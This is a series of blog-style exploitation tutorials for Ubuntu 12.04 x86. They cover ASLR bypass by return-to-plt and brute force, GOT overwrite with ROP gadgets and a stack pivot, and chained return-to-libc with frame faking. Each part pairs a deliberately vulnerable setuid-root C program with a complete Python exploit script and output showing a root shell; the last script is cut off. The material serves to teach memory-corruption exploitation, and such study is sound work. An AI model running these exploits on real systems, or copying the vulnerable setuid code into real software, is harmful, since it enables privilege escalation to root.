Stack pivoting is done using “leave ret” instruction. As we already know “leave” instruction translates to

mov ebp, esp
pop ebp

Thus before “leave” instruction, loading EBP with custom stack address – makes ESP point to EBP, when”leave” gets executed!! Thus having pivoted to custom stack, we continue executing the series of libc functions loaded in custom stack, which results in spawning a root shell!!

Complete Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#GOT overwrite using ROP gadgets
'''
 G1: 0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ;
 G2: 0x080484a2: popl %ebx ; pop ebp; ret ;
 G3: 0x????????: popl %eax ; ret ; (NOT found)
 G4: 0x080485b3: mov 0x34(%esp),%eax...
 G5: 0x08048380: pop ebx ; ret ;
 G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ;
 G7: 0x08048498: movb $0x1,0x804a028...
'''

g1 = 0x0804849e
g2 = 0x080484a2
g4 = 0x080485b3
g5 = 0x08048380
g6 = 0x080485cd
g7 = 0x08048498
dummy = 0xdeadbeef
esi = 0x01020101
edi = 0x01020102
ebx = 0x3fc9c18               #ebx = 0x8049f3c - (esi*4) + 0xe0
off = 0xfffff530

#Custom Stack
#0x804a360 - Dummy EBP|seteuid@PLT|getuid@PLT|seteuid_arg|execve_arg1|execve_arg2|execve_arg3
cust_esp = 0x804a360          #Custom stack base address
cust_base_esp = 0x804a360     #Custom stack base address
#seteuid@PLT 0x80483c0
seteuid_oct1 = 0x8048143      #08
seteuid_oct2 = 0x8048130      #04
seteuid_oct3 = 0x8048355      #83
seteuid_oct4 = 0x80481cb      #c0
#getuid@PLT 0x80483b0
getuid_oct1 = 0x8048143       #08
getuid_oct2 = 0x8048130       #04
getuid_oct3 = 0x8048355       #83
getuid_oct4 = 0x80483dc       #b0
#seteuid_arg 0x00000000
seteuid_null_arg = 0x804a360
#execve_arg1 0x804ac60
execve_arg1_oct1 = 0x8048143  #08
execve_arg1_oct2 = 0x8048130  #04 
execve_arg1_oct3 = 0x8048f44  #AC 
execve_arg1_oct4 = 0x804819a  #60
#execve_arg2 0x804ac68
execve_arg2_oct1 = 0x8048143  #08
execve_arg2_oct2 = 0x8048130  #04 
execve_arg2_oct3 = 0x8048f44  #AC 
execve_arg2_oct4 = 0x80483a6  #68
#execve_arg3 0x00000000
execve_null_arg = 0x804a360
execve_path_dst = 0x804ac60   #Custom stack location which contains execve_path "/bin/sh"
execve_path_oct1 = 0x8048154  #/
execve_path_oct2 = 0x8048157  #b
execve_path_oct3 = 0x8048156  #i
execve_path_oct4 = 0x804815e  #n
execve_path_oct5 = 0x8048162  #s
execve_path_oct6 = 0x80483a6  #h
execve_argv_dst = 0x804ac68   #Custom stack location which contains execve_argv [0x804ac60, 0x0]
execve_argv1_oct1 = 0x8048143 #08
execve_argv1_oct2 = 0x8048130 #04 
execve_argv1_oct3 = 0x8048f44 #AC 
execve_argv1_oct4 = 0x804819a #60
strcpy_plt = 0x80483d0        #strcpy@PLT
ppr_addr = 0x080485ce         #popl %edi ; popl %ebp ; ret ;

#Stack Pivot
pr_addr = 0x080484a3          #popl %ebp ; ret ;
lr_addr = 0x08048569          #leave ; ret ;

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = "A" * 268 #Junk
buf += conv(g7)               #movb $0x1,0x804a028; add esp, 0x04; pop ebx; pop ebp; ret;
buf += conv(dummy)
buf += conv(dummy)
buf += conv(dummy)
buf += conv(g6)               #pop esi; pop edi; pop ebp; ret;
buf += conv(esi)              #esi
buf += conv(edi)              #edi
buf += conv(dummy)
buf += conv(g5)               #pop ebx; ret;
buf += conv(ebx)              #ebx
buf += conv(g4)               #mov 0x34(%esp),%eax; ...

for num in range(0,11):
 buf += conv(dummy)

buf += conv(g2)               #pop ebx; pop ebp; ret;
ebx = 0xaaa99b40              #getuid@GOT-0x5d5b04c4
buf += conv(ebx)
buf += conv(off)
buf += conv(g1)               #addl %eax, 0x5D5B04C4(%ebx); ret;
#Custom Stack
#Below stack frames are for strcpy (to copy seteuid@PLT to custom stack)
cust_esp += 4                 #Increment by 4 to get past Dummy EBP.
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_oct4)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_oct3)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_oct2)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_oct1)
#Below stack frames are for strcpy (to copy getuid@PLT to custom stack)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(getuid_oct4)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(getuid_oct3)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(getuid_oct2)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(getuid_oct1)
#Below stack frames are for strcpy (to copy seteuid arg  to custom stack)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(seteuid_null_arg)
#Below stack frames are for strcpy (to copy execve_arg1  to custom stack)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg1_oct4)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg1_oct3)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg1_oct2)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg1_oct1)
#Below stack frames are for strcpy (to copy execve_arg2  to custom stack)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg2_oct4)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg2_oct3)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg2_oct2)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_arg2_oct1)
#Below stack frames are for strcpy (to copy execve_arg3  to custom stack)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_null_arg)
cust_esp += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(cust_esp)
buf += conv(execve_null_arg)
#Below stack frame is for strcpy (to copy execve path "/bin/sh" to custom stack @ loc 0x804ac60)
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct1)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct2)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct3)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct4)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct1)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct5)
execve_path_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_path_dst)
buf += conv(execve_path_oct6)
#Below stack frame is for strcpy (to copy execve argv[0] (0x804ac60) to custom stack @ loc 0x804ac68)
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_argv1_oct4)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_argv1_oct3)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_argv1_oct2)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_argv1_oct1)
#Below stack frame is for strcpy (to copy execve argv[1] (0x0) to custom stack @ loc 0x804ac6c)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_null_arg)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_null_arg)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_null_arg)
execve_argv_dst += 1
buf += conv(strcpy_plt)
buf += conv(ppr_addr)
buf += conv(execve_argv_dst)
buf += conv(execve_null_arg)
#Stack Pivot
buf += conv(pr_addr)
buf += conv(cust_base_esp)
buf += conv(lr_addr)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit code gives us root shell (as shown below):

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��ᆳ�ᆳ�ᆳ�ͅᆳހ�����ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳޢ�@���0�����Ѓ΅d�ˁЃ΅e�U�Ѓ΅f�0�Ѓ΅g�C�Ѓ΅h�܃Ѓ΅i�U�Ѓ΅j�0�Ѓ΅k�C�Ѓ΅l�`�Ѓ΅m�`�Ѓ΅n�`�Ѓ΅o�`�Ѓ΅p���Ѓ΅q�Ѓ΅r�0�Ѓ΅s�C�Ѓ΅t���Ѓ΅u�Ѓ΅v�0�Ѓ΅w�C�Ѓ΅x�`�Ѓ΅y�`�Ѓ΅z�`�Ѓ΅{�`�Ѓ΅`�T�Ѓ΅a�W�Ѓ΅b�V�Ѓ΅c�^�Ѓ΅d�T�Ѓ΅e�b�Ѓ΅f���Ѓ΅h���Ѓ΅i�Ѓ΅j�0�Ѓ΅k�C�Ѓ΅l�`�Ѓ΅m�`�Ѓ΅n�`�Ѓ΅o�`���`�i�
Len:1008
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Reference:

Bypassing ASLR – Part II

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In this post lets see how to bypass shared library address randomization using brute force technique.

What is brute-force?

In this technique attacker chooses a particular libc base address and continues to attack the program until he succeeds. This technique is the simplest of the technique to bypass ASLR, provided you get lucky 🙂

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 fflush(stdout);
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Lets now see how attacker brute forces libc base address. Below is the different libc base addresses (when randomization is turned on):

$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b6000)
$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7568000)
$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7595000)
$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75d9000)
$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7542000)
$ ldd ./vuln | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb756a000)
$

As shown above libc randomization is limited to 8 bits. Hence a maximum of 256 tries, should gives us a root shell. In the below exploit code lets choose libc base address to be 0xb7595000 and lets make multiple tries.

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

libc_base_addr = 0xb7595000
exit_off = 0x00032be0             #Obtained from "readelf -s libc.so.6 | grep system" command.
system_off = 0x0003f060           #Obtained from "readelf -s libc.so.6 | grep exit" command.
system_addr = libc_base_addr + system_off
exit_addr = libc_base_addr + exit_off
system_arg = 0x804827d

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system_addr)
buf += conv(exit_addr)
buf += conv(system_arg)

print "Calling vulnerable program"
#Multiple tries until we get lucky
i = 0
while (i < 256):
 print "Number of tries: %d" %i
 i += 1
 ret = call(["./vuln", buf])
 if (not ret):
  break
 else:
  print "Exploit failed"

Running the above exploit code gives us root shell (as shown below):

$ python exp.py 
Calling vulnerable program
Number of tries: 0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`@]��{\�}�
Exploit failed
...
Number of tries: 42
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`@]��{\�}�
Exploit failed
Number of tries: 43
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`@]��{\�}�
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Similarly stack and heap segment address can also be brute forced!!

Bypassing ASLR – Part I

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that attacker needs to know

  • stack address (to jump to shellcode)
  • libc base address (to successfully bypass NX bit)

inorder to exploit a vulnerable code. Hence to thwart attacker’s action, security researchers came up with an exploit mitigation called “ASLR”!!

What is ASLR?

Address space layout randomization (ASLR) is an exploit mitigation technique that randomizes

  • Stack address.
  • Heap address.
  • Shared library address.

Once the above addresses are randomized, in particular when shared library address is randomized, the approach we took to bypass NX bit wont work since attacker needs to know libc base address. But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass shared library address randomization!!

We already know from previous post’s exp.py libc function address was calculated as follows:

libc function address = libc base address + function offset

where

  • libc base address was constant (0xb7e22000 – for our ‘vuln’ binary) since randomization was turned off.
  • function offset was also constant (obtained from “readelf -s libc.so.6 | grep “)

Now when we turn on full randomization (using below command)

#echo 2 > /proc/sys/kernel/randomize_va_space

libc base address would get randomized.

NOTE: Only libc base address is randomized, offset of a particular function from its base address always remains constant!! Hence if we can bypass shared library base address randomization, vulnerable programs can be successfully exploited (using below three techniques) even when ASLR is turned on!!

  • Return-to-plt (this post)
  • Brute force (part 2)
  • GOT overwrite and GOT dereference (part 3)

What is return-to-plt?

In this technique instead of returning to a libc function (whose address is randomized), attacker returns to a function’s PLT (whose address is NOT randomized – its address is known prior to execution itself). Since ‘function@PLT’ is not randomized, attacker no more needs to predict libc base address instead he can simply return to ‘function@PLT’ inorder to invoke ‘function’.

What is PLT, how does invoking ‘function@PLT’ invokes ‘function’?

To know about Procedural Linkage Table (PLT), let me brief about shared libraries!!

Unlike static libraries, shared libraries text segment is shared among multiple processes while its data segment is unique to each process. This helps in reducing memory and disk space. Since text segment is shared among multiple processes, it should have only Read and eXecute permissions and hence dynamic linker cannot relocate a data symbol or a function address present inside the text segment (since there is no write permission to it). Then how does dynamic linker relocate shared library symbols at runtime without modifying its text segment? Its done using PIC!!

What is PIC?

Position Independent Code (PIC) was developed to address this issue – It makes sure that shared libraries text segment is shared among multiple processes despite performing relocation at load time. PIC achieves this with a level of indirection – Shared libraries text segment doesnt contain absolute virtual address in place of global symbol and function references instead it points to a specific table in data segment. This table is the place-holder for global symbol and function’s absolute virtual address. Dynamic linker as part of relocation fills up this table. Thus while relocation only data segment is modified and text segment remains intact!!

Dynamic linker relocates global symbols and functions found in PIC in two different ways as described below:
  • Global Offset Table (GOT): Global offset table contains a 4 byte entry for each global variable, where the 4 byte entry contains the address of the global variable. When an instruction in code segment refers to a global variable, instead of global variable’s absolute virtual address the instruction points to an entry in GOT. This GOT entry is relocated by the dynamic linker when the shared library is loaded. Thus PIC uses this table to relocate global symbols with a single level of indirection.
  • Procedural Linkage Table (PLT)Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(function@PLT). This stub code with the help of dynamic linker resolves the function address and its copied to GOT (GOT[n]). This resolution happens only during the first invocation of the function (‘function’), later on when a call instruction in code segment calls the stub code ( function@PLT) instead of invoking dynamic linker to resolve the function address (‘function’), stub code directly obtains the function address from GOT (GOT[n]) and jumps to it.Thus PIC uses this table to relocate function addresses with two level of indirection.

Good you read about PIC and understood that it helps to keep shared libraries text segment intact and hence it helps shared libraries text segment to be really shared among many processes!!. But did you ever wonder, why on the earth executable’s text segment need to have a GOT entry or PLT stub code when its NOT shared among any process?!? Its because of security protection mechanism. Nowadays by default text segments are only given read and execute permission and no write permission (R_X). This security protection mechanism doesnt allow even the dynamic linker to write to text segment and hence it cant relocate data symbols or function address found inside the text segment. Hence to allow dynamic linker relocation, executables too need GOT entries and PLT stub codes just like shared libraries!!

Example:

//eg.c
//$gcc -g -o eg eg.c
#include <stdio.h>

int main(int argc, char* argv[]) {
 printf("Hello %s\n", argv[1]);
 return 0;
}

Below disassembly shows us that ‘printf’ isnt invoked directly instead its corresponding PLT code is invoked ‘printf@PLT’.

(gdb) disassemble main
Dump of assembler code for function main:
 0x080483e4 <+0>: push %ebp
 0x080483e5 <+1>: mov %esp,%ebp
 0x080483e7 <+3>: and $0xfffffff0,%esp
 0x080483ea <+6>: sub $0x10,%esp
 0x080483ed <+9>: mov 0xc(%ebp),%eax
 0x080483f0 <+12>: add $0x4,%eax
 0x080483f3 <+15>: mov (%eax),%edx
 0x080483f5 <+17>: mov $0x80484e0,%eax
 0x080483fa <+22>: mov %edx,0x4(%esp)
 0x080483fe <+26>: mov %eax,(%esp)
 0x08048401 <+29>: call 0x8048300 <printf@plt>
 0x08048406 <+34>: mov $0x0,%eax
 0x0804840b <+39>: leave 
 0x0804840c <+40>: ret 
End of assembler dump.
(gdb) disassemble 0x8048300
Dump of assembler code for function printf@plt:
 0x08048300 <+0>: jmp *0x804a000
 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0
End of assembler dump.
(gdb) 

Before printf’s first invocation, its corresponding GOT entry (0x804a000) points back to PLT code (0x8048306) itself. Thus when first time printf function is invoked, its corresponding function address gets resolved with the help of dynamic linker.

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0x08048306
(gdb)

Now after printf’s invocation, its corresponding GOT entry contains printf function address (as shown below):

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0xb7e6e850
(gdb)

NOTE 1: If you want to know more PLT’s and GOT’s, check out this blog post!!

NOTE 2: In a separate post, I’ll talk in detail about how a libc function address is resolved dynamically with the help of dynamic linker. As of now just remember that below two statements (part of printf@PLT) are responsible for function address resolution!!

 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0

Now with these knowledge, we come to know that attacker doesn’t need exact libc function address to invoke a libc function, he can simply invoke it using ‘function@PLT’ address (which is know prior to execution).

Vulnerable Code:

#include <stdio.h>
#include <string.h>

/* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */
void shell() {
 system("/bin/sh");
 exit(0);
}

int main(int argc, char* argv[]) {
 int i=0;
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Now disassembling executable ‘vuln’ we can find addresses of ‘system@PLT’ and ‘exit@PLT’

(gdb) disassemble shell
Dump of assembler code for function shell:
 0x08048474 <+0>: push %ebp
 0x08048475 <+1>: mov %esp,%ebp
 0x08048477 <+3>: sub $0x18,%esp
 0x0804847a <+6>: movl $0x80485a0,(%esp)
 0x08048481 <+13>: call 0x8048380 <system@plt>
 0x08048486 <+18>: movl $0x0,(%esp)
 0x0804848d <+25>: call 0x80483a0 <exit@plt>
End of assembler dump.
(gdb)

Using these addresses we can write an exploit code which bypasses ASLR (and NX bit)!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

system = 0x8048380
exit = 0x80483a0
system_arg = 0x80485b5     #Obtained from hexdump output of executable 'vuln'

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 272
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA������
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Inorder to to get this root shell, executable should contain ‘system@PLT’ and ‘exit@PLT’ code. In part III, I will discuss about GOT overwrite and GOT dereferencing techniques which helps attackers to invoke a libc function even when there is no required PLT stub code present in the executable and also when ASLR is turned on.

Bypassing NX bit using chained return-to-libc

Prerequisite:

  1. Classic Stack Based Buffer Overflow
  2. Bypassing NX bit using return-to-libc

VM Setup: Ubuntu 12.04 (x86)

Chained returned-to-libc?

As seen in previous post, need arises for an attacker to call multiple libc functions for a successful exploit. A simple way to chain multiple libc functions is to place one libc function address after another in the stack, but its not possible because of function arguments. Not very clear, no issues just read on!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 seteuid(getuid()); /* Temporarily drop privileges */
 strcpy(buf,argv[1]);
 printf("%s",buf);
 fflush(stdout);
 return 0;
}

NOTE: This code is same as the vulnerable code listed in previous post (vuln_priv.c).

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

As said in previous post, chaining seteuid, system and exit would allows us to exploit the vulnerable code ‘vuln’. But is not a straight forward task because of below two problems:

  1. At the same position in the stack, attacker would be needed to place function argument of both libc functions or a function argument of one libc function and an address of another libc function which is obviously not possible (as depicted in the below picture).
  2. seteuid_arg should be zero. But since our buffer overflow is due to strcpy, zero becomes a bad character ie) characters after this zero wont be copied into the stack by strcpy().

Lets now see how to overcome these two problems.

Problem 1: To address this problem Nergal talks about two brilliant techniques

  1. ESP Lifting
  2. Frame Faking

in his phrack article. Here lets see ONLY about frame faking since to apply esp lifting technique binary should be compiled without frame pointer (-fomit-frame-pointer) support. But since our binary (vuln) contains frame pointers, we need to apply frame faking technique.

Frame Faking?

In this technique instead of overwriting return address directly with libc function address (seteuid in this example), we overwrite it with “leave ret” instruction. This allows the attacker to store function arguments in stack without any overlap and thus allowing its corresponding libc function to be invoked, without any issues. Lets see how?.

Stack Layout: While faking frame attacker overflows the buffer as shown in below stack layout to successfully chain libc functions seteuid, system and exit:

Red highlighted ones in the above picture are return addresses where every “leave ret” instruction invokes the libc function above it. For example the first “leave ret” instruction (located at stack address 0xbffff1fc) invokes seteuid(), while the second “leave ret” (located at stack address 0xbffff20c) invokes system() and the third “leave ret” instruction (located at stack address 0xbffff21c) invokes exit().

How a leave ret instruction invokes a libc function above it?

To know the answer for the above question, first we need to know about “leave”. A “leave” instruction translates to:

mov ebp,esp            //esp = ebp
pop ebp                //ebp = *esp

Lets disassemble main() function to know more about “leave ret” instruction.

(gdb) disassemble main
Dump of assembler code for function main:
  ...
  0x0804851c <+88>: leave                  //mov ebp, esp; pop ebp;
  0x0804851d <+89>: ret                    //return
End of assembler dump.
(gdb)

Main’s Epilogue:

Before main’s epilogue executed, as shown in the above stack layout, attacker would have overflown the buffer and would have overwritten, main’s ebp with fake_ebp0 (0xbffff204) and return address with “leave ret” instruction address (0x0804851c). Now when CPU is about to execute main’s epilogue,  EIP points to text address 0x0804851c (“leave ret”). On execution, following happens:

  • ‘leave’ changes following registers
    • esp = ebp = 0xbffff1f8
    • ebp = 0xbffff204, esp = 0xbffff1fc
  • ‘ret’ executes “leave ret” instruction (located at stack address 0xbffff1fc) .

seteuid: Now again EIP points to text address 0x0804851c (“leave ret”). On execution, following happens:

  • ‘leave’ changes following registers
    • esp = ebp = 0xbffff204
    • ebp = 0xbffff214, esp =0xbffff208
  • ‘ret’ executes seteuid() (located at stack address 0xbffff208). To invoke seteuid successfully, seteuid_arg should be placed at offset 8 from seteuid_addr ie) at stack address 0xbffff210
  • After seteuid() gets invoked, “leave ret” instruction (located at stack address 0xbffff20c), gets executed.

Following the above procedure, system and exit would also get invoked since the stack is setup’d for it invocation by the attacker – as shown in the above stack layout picture.

Problem 2: In our case seteuid_arg should be zero. But since zero being a bad character, how to write zero at stack address 0xbffff210? There is a simple solution to it, which is discussed by nergal in the same article. While chaining libc functions, first few calls should be strcpy which copies a NULL byte into seteuid_arg’s stack location.

NOTE: But unfortunately in my libc.so.6 strcpy’s function address is 0xb7ea6200 – ie) libc function address itself contains a NULL byte (bad character!!). Hence strcpy cant be used to successfully exploit the vulnerable code. sprintf (whose function address is 0xb7e6e8d0) is used as a replacement for strcpy ie) using sprintf NULL byte is copied in to seteuid_arg’s stack location.

Thus following libc functions are chained to solve the above two problems and to successfully obtain root shell:

sprintf | sprintf | sprintf | sprintf | seteuid | system | exit

Exploit code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

fake_ebp0 = 0xbffff1a0
fake_ebp1 = 0xbffff1b8
fake_ebp2 = 0xbffff1d0
fake_ebp3 = 0xbffff1e8
fake_ebp4 = 0xbffff204
fake_ebp5 = 0xbffff214
fake_ebp6 = 0xbffff224
fake_ebp7 = 0xbffff234
leave_ret = 0x0804851c
sprintf_addr = 0xb7e6e8d0
seteuid_addr = 0xb7f09720
system_addr = 0xb7e61060
exit_addr = 0xb7e54be0
sprintf_arg1 = 0xbffff210
sprintf_arg2 = 0x80485f0
sprintf_arg3 = 0xbffff23c
